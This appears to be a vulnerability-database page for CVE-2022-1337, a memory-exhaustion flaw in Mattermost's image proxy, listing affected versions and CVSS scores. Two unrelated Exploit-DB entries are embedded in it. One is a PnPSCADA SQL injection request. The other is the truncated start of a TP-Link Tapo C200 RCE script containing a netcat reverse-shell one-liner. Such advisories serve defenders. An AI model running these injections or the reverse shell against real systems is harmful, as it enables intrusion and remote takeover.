CVE-2022-1337
published 2022-04-13CVE-2022-1337: The image proxy component in Mattermost version 6.4.1 and earlier allocates memory for multiple copies of a proxied image, which allows an authenticated…
PriorityP434medium6.5CVSS 3.1
AVNACLPRLUINSUCNINAH
EPSS
0.88%
55.4th percentile
The image proxy component in Mattermost version 6.4.1 and earlier allocates memory for multiple copies of a proxied image, which allows an authenticated attacker to crash the server via links to very large image files.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | mattermost_mattermost-server_v6 | >= 0 < 6.4.2 | 6.4.2 |
| mattermost | mattermost | >= 5.37 < 5.37.9 | 5.37.9 |
| mattermost | mattermost | >= 6.2 < 6.2.5 | 6.2.5 |
| mattermost | mattermost | >= 6.3 < 6.3.5 | 6.3.5 |
| mattermost | mattermost | >= 6.4 < 6.4.2 | 6.4.2 |
| mattermost | mattermost_server | >= 5.37.0 < 5.37.9 | 5.37.9 |
| mattermost | mattermost_server | >= 6.2.0 < 6.2.5 | 6.2.5 |
| mattermost | mattermost_server | >= 6.3.0 < 6.3.5 | 6.3.5 |
| mattermost | mattermost_server | >= 6.4.0 < 6.4.2 | 6.4.2 |
CVSS provenance
nvdv3.16.5MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
nvdv2.04.0MEDIUMAV:N/AC:L/Au:S/C:N/I:N/A:P
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Resource exhaustion in Mattermost in github.com/mattermost/mattermost-server
osv·2024-08-21
CVE-2022-1337 Resource exhaustion in Mattermost in github.com/mattermost/mattermost-server
Resource exhaustion in Mattermost in github.com/mattermost/mattermost-server
Resource exhaustion in Mattermost in github.com/mattermost/mattermost-server
OSV
Resource exhaustion in Mattermost
osv·2022-04-14
CVE-2022-1337 [MEDIUM] Resource exhaustion in Mattermost
Resource exhaustion in Mattermost
The image proxy component in Mattermost version 6.4.1 and earlier allocates memory for multiple copies of a proxied image, which allows an authenticated attacker to crash the server via links to very large image files.
GHSA
Resource exhaustion in Mattermost
ghsa·2022-04-14
CVE-2022-1337 [MEDIUM] CWE-400 Resource exhaustion in Mattermost
Resource exhaustion in Mattermost
The image proxy component in Mattermost version 6.4.1 and earlier allocates memory for multiple copies of a proxied image, which allows an authenticated attacker to crash the server via links to very large image files.
No detection rules found.
Exploit-DB
PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
exploitdb·2023-05-23·CVSS 9.8
CVE-2023-1934 [CRITICAL] PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
---
# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
# Date: 15/5/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd
# Vendor Homepage: https://pnpscada.com/
# Version: PnPSCADA (cross platforms): v2.x
# Tested on: Unix
# CVE : CVE-2023-1934
# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8
SQLi crashing point:
GET /hitlogcsv.isp?userids=1337'&startdate=
2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00
HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US)
AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0
Safari/534.14
Host: vulnerablepnpscada.int
Accept: */*
Accept-Encoding: gzip
Exploit-DB
TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
exploitdb·2022-09-23·CVSS 9.8
CVE-2021-4045 [CRITICAL] TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
---
# Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
# Date: 02/11/2022
# Exploit Author: hacefresko
# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/
# Version: 1.1.15 and below
# Tested on: 1.1.11, 1.1.14 and 1.1.15
# CVE : CVE-2021-4045
# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce
import requests, urllib3, sys, threading, os
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
PORT = 1337
REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'
NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version)
if len(sys.ar
No writeups or analysis indexed.
2022-04-13
Published